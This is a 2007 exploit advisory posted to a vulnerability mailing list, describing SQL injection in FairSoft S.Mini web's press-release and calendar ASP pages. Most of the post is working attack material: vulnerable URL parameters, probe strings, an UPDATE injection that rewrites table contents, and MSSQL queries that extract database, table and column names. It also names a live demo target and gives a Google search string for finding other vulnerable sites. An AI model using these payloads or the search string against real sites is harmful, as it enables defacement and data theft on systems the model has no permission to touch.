Security Advisory: FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  IceBB 1.0rc6 <= Remote SQL Injection
  IceBB 1.0rc6 <= Remote SQL Injection
  VigileCMS 1.4 Multiple Remote Vulnerabilities
  MoBiC-18: PHP-Fusion CAPTCHA bypass

From: okan alp <codexploder_(at)_hotmail.com>
Date: 19.11.2007
Subject: FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection

thnx bro

FairSoft S.Mini web Busines Prelease   Calendar asp Sql injection

#include patch...ocf,ns

#(ocf/Calendar/ViewEvent.asp,ns/Calendar/ViewEvent.asp,
aboutus/newsroom/ViewPressRelease.asp

Credit : CodeXpLoder'tq

Mail   : codexploder[at]hotmail[dot]com

Site   : codexploder.biyosecurity.net,biyofrm.com

Sourge : ocfair.com

##########################################################################
ЈЈЈ

Thnx   : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A

Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman

and

BiyoSecurity all members

###########################################################################
^^^^

1-) example.com/[patch]/[patch]/ViewPressRelease.asp?PRelId=sql methot)

1-) example.com/ns/PressRelease/ViewPressRelease.asp?PRelId=sql methot)

2-) example.com/[patch]/[patch]/[patch]/ViewPressRelease.asp?PRelId=sql methot)

2-) example.com/fp/AboutUs/Newsroom/ViewPressRelease.asp?PRelId=sql methot)

3-) example.com/[patch]/[patch]/ViewPressRelease.asp?PRelId=sql methot)

3-) example.com/ns/Calendar/ViewEvent.asp?EventId=sql methot)

ЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈ

ЈЈЈЈ

2-) example.com/[patch]/[patch]/ViewPressRelease.asp?PRelId=(sql methot)

2-) PressRelease/ViewPressRelease.asp?PRelId(sql methot)

2-) PressRelease/ViewPressRelease.asp?PRelId=1'

2-) PressRelease/ViewPressRelease.asp?PRelId=1 having 1=1

2-) PressRelease/ViewPressRelease.asp?PRelId1,2,3,4,5

2-) PressRelease/ViewPressRelease.asp?PRelId1,2,3,4,
5+update+tbl+set+column='your text or meta code';--

2-) example.com/Calendar/ViewEvent.asp?EventId=<amt>

#for db : convert(int, db_name(1)

    : convert(int, db_name(2)

#for other tbl    : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))

#tbl    : PressReleases for #event tbl: Events
#column : ReleaseTitle      #clmn     : vchEventName

##########################################################

demo site: http://kerncountyfair.ntelligentsystems.com/home.asp

google search code : inurl:"ViewPressRelease.asp?PRelId"

test server